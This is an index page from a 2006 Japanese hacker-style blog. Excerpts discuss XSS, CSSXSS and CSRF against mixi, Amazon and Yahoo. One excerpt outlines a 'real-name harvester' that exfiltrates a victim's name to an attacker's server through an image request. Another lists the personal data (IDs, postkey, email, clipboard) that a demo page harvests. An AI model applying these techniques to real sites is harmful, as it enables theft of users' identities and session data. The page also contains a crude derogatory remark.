ぼくはまちちゃん！ [mixi][ミクシィ][セキュリティ][tips]

こんにちはこんにちは！！
クロスサイトスクリプティングの時間です！

XSSというと…！
まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね！

たとえばこんな感じのフォームから受け取ったパラメータを、
確認として表示するページとか！

続きはこちら   [コメント:3件 トラックバック:4件] 2006/08/02 [04:49]

soumu.go.jp とか＞＜

なので、 .htaccess (とか httpd.conf) で

ってしてみたよ！

続きはこちら   [コメント:3件 トラックバック:1件] 2006/07/04 [19:36]

むだに gifアニメとかつけてみたら、ちょっとかっこよくなったかも！

→ 本名吸い取り機 (AMAZON XSS)

続きはこちら   [コメント:0件 トラックバック:0件] 2006/05/19 [13:52]

↓これ

超おすすめマンガなんです！！！ うそだけど！ ( 修正がはいりました。もう動きません )

取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…！

本名吸い取り機のできあがり！

続きはこちら   [コメント:6件 トラックバック:3件] 2006/05/18 [17:25]

こんにちはこんにちは！！

現在の超mixi足あとちょうは、何度かのバージョンアップをして、以下のような内容になってますよ！

きみのMIXI ID：
きみのpostkey：
きみのメールアドレス： ※mixiの修正が4回入って、現在は非表示
きみのブラウザ：
きみのホスト名：
リンク元：
(おまけ４) きみのYahoo ID：
(おまけ５) きみのHatena ID：
(おまけ２) きみのlivedoor ID：
(おまけ６) きみのGoogleアカウント：
(おまけ３) きみのなまえ(amazon)：
(おまけ７) きみの好みのタイプ：
(おまけ１) きみのクリップボードの中身

ところで、超mixi足あとちょうの追記にも書いたけれど、
「hamachiya.com を見にいかなければ大丈夫」で
思考停止するのって一番危険なんじゃないかな、と思うんだけど…！

続きはこちら   [コメント:9件 トラックバック:0件] 2006/05/03 [03:51]

mhtmlスキーム？っていうのを使った時に JISだか SJISだかにエンコードされちゃうのかな？

なんだかよくわからないけど EUC のサイトの日本語部分はうまくできそうにないや＞＜
だけど、amazon みたいな SJIS のサイトはやばいのかもしれないね。

↓おまけコーナーで amazon じっけんちゅうだよ。ちゃんとうごくかな。
http://hamachiya.com/junk/getmixi.html

続きはこちら   [コメント:2件 トラックバック:0件] 2006/04/30 [07:54]

超mixi足あとちょうも Ver.2 になりました＞＜
ちゃんとメール表示されるようになおしておいたよ！
→ http://hamachiya.com/junk/getmixi.html

※ http://mixi.jp/edit_account.pl の修正が入ったもよう (登録アドレスが非表示になった)
(参考)
http://d.hatena.ne.jp/the-next/20060429/1146330985

続きはこちら   [コメント:0件 トラックバック:0件] 2006/04/30 [02:34]

mixiのやつじゃなくて、cssxssでyahooとかはてなのid表示するやつのほうなんだけど！

windows updateのせい？

続きはこちら   [コメント:0件 トラックバック:0件] 2006/04/28 [13:32]

[観] Googlecloud が「叫び」の場になっている件 を見て、ぼくも Googlecloud をやってみた！

2分くらい遊んで飽きて、巨大文字のつくりかたを考えてみたよ！

続きはこちら   [コメント:1件 トラックバック:1件] 2006/02/15 [20:52]

「旅行びと日記」日記: CSRF対策
トラックバックしちゃうよ！

はまちちゃんとかCSRF対策には、パーソナルバー上にログアウトを置いておけば、いつでもどこでも(?)「あ、忘れてた」って時にもすぐログアウトできて、安心安心。
お守り代わりにどうぞ。

もっと良い方法があるよね…？

続きはこちら   [コメント:0件 トラックバック:0件] 2006/02/12 [00:48]

最速さまの RSSリーダー(Bloglines) にぼくのサイトが登録されてたよ！
うわーぼく緊張しちゃうよ！！

続きはこちら   [コメント:0件 トラックバック:0件] 2006/02/06 [00:49]

　
http://www.geocities.jp/hamachiya2/naniemon.wmv (18MB)

どう見てもホモ動画です。閲覧注意(精神有害)。

※我が家のポエム専用機に落っこちてきてたキャッシュファイルより。
　 ご丁寧に名前まで捏造されていたよ…！

続きはこちら   [コメント:2件 トラックバック:0件] 2006/01/24 [02:40]

ぼく普段からYahooなんて、せいぜい天気とか、たまにヤフオク見に行ったりするくらいで、
実はあまり知らなかったんだよ。

で、昨日 CSSXSSでYahoo!IDゲット みたいなこと書いたし、
他にどんなサービスがあるのかなぁと思って、ちょっと見にいってみたんだ。

そしたら「Yahoo! Bookmarks」なんてサービスがあるじゃん！
さっそく使ってみたよ！！

…

うわなにこれ画期的！！！！ やふー天才！？！？！？！？！

続きはこちら   [コメント:5件 トラックバック:0件] 2006/01/20 [16:50]

といってもぼく英語と毛虫が死んぢゃうくらい苦手なんで
Google翻訳とExcite翻訳をつかうんだけどね！

続きはこちら   [コメント:1件 トラックバック:0件] 2006/01/12 [13:02]

　
ポイントは貯めるより、毎回使い切るほうがお得 (したらば元社長日記)

↑こちらの記事を見て、以前、友人と話したことを思い出した。

友人曰く「ポイントを小物とかにすぐ使っちゃうのってばかだろ」

ぼく「え、なんで？」

友人「貯めていけばいつの間にかでかいものがタダで買えるのに」

続きはこちら   [コメント:9件 2006/01/09 [18:15]

そうだ。これを見ればよかったんだ。

続きはこちら   [コメント:7件 トラックバック:0件] 2006/01/07 [19:11]

ぼくの友人のはまちや（１）くんが、
むかしミクシィで書いていた日記を無断で公開しちゃうよ！

かつて、はまちや君がミクシィをはじめて間もない頃、
とてもクオリティの高い人とマイミクになったのさ。

その人の名はノトさん。

ある時、マイミクの誰かが絵を描いてうｐしていたのを見て
はまちや君も描いてみた。
ノトさんの絵を。
想像で…！

続きはこちら   [コメント:6件 トラックバック:0件] 2005/11/12 [22:33]

ちょっとずつでも色んな機能をつけたせていけたらいいな！

続きはこちら   [コメント:17件 トラックバック:1件] 2005/11/10 [23:02]

これは本文！
どうみても本文です！

続きはこちら   [コメント:4件 トラックバック:2件] 2005/11/07 [00:55]

続きはこちら   [コメント:2件 トラックバック:0件] 2005/11/06 [18:48]

これはぼくのめもだ。
いま改行した。だからこれは2行目！

続きはこちら   [コメント:3件 2005/11/06 [17:16]